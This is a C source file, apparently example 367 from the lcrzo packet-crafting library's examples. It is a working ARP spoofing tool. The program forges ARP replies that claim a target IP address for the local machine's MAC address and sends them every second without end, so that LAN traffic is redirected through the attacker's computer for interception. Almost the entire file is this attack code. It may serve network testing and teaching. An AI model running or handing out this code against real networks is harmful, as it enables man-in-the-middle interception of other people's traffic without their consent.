
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000367=
{ /*reference*/     "lcrzoex", 367,
  /*version*/       1, 0,
  /*title*/         "periodically spoof an ARP reply redirecting trafic to our computer",
  /*french title*/  "spoofe periodiquement une reponse ARP pour rediriger le trafic vers notre ordi",
  /*description*/   "Note : IP routing has to be activated",
  /*french desc.*/  "Note : le routage IP doit etre actif",
  /*usage*/         "device computertospoof [ip_to_which_answer]",
  /*french usage*/  "device ordiaspoofer [ip_a_qui_repond]",
  /*usage example*/ "eth0 1.2.3.254 1.2.3.6",
  /*fr. usage ex.*/ "eth0 1.2.3.254 1.2.3.6",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000367_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000367_main(int argc, char *argv[])
{ lcrzo_spoof spoof;
  lcrzo_hdrleth hdrleth;
  lcrzo_hdrlarp hdrlarp;
  lcrzo_device device;
  lcrzo_etha localeth, ethdest;
  lcrzo_ipl ipltospoof, ipldest;

  lcrzo_init();
  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000367, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));

  /* initialize addresses */
  lcrzo_epr(lcrzo_etha_init_device(device, localeth));
  lcrzo_epr(shared_para_ipl_init_src(argv[2], &ipltospoof));
  if (argc>=4)
  { lcrzo_epr(shared_para_ipl_init_dst(argv[3], &ipldest));
    lcrzo_epr(lcrzo_etha_init_ipl(ipldest, ethdest));
  }
  else
  { ipldest=0;
    lcrzo_epr(lcrzo_etha_init(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, ethdest));
  }

  /* initialize Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdrleth));
  lcrzo_epr(lcrzo_etha_init_etha(localeth, hdrleth.src));
  lcrzo_epr(lcrzo_etha_init_etha(ethdest, hdrleth.dst));
  hdrleth.type=LCRZO_HDRLETH_TYPE_ARP;

  /* initialize ARP header */
  lcrzo_epr(lcrzo_hdrlarp_initdefault(&hdrlarp));
  hdrlarp.op = 2;
  lcrzo_epr(lcrzo_etha_init_etha(localeth, hdrlarp.hw_src));
  lcrzo_epr(lcrzo_ipa_init_ipl(ipltospoof, hdrlarp.prot_src));
  lcrzo_epr(lcrzo_etha_init_etha(ethdest, hdrlarp.hw_dst));
  lcrzo_epr(lcrzo_ipa_init_ipl(ipldest, hdrlarp.prot_dst));

  /* spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_TRUE));
  while (LCRZO_TRUE)
  { lcrzo_epr(lcrzo_spoof_etharp(&spoof, device, hdrleth, hdrlarp));
    lcrzo_epr(lcrzo_time_sleep_sec(1));
  }
  lcrzo_epr(lcrzo_spoof_close(&spoof));

  lcrzo_close();
  return(LCRZO_ERR_OK);
}
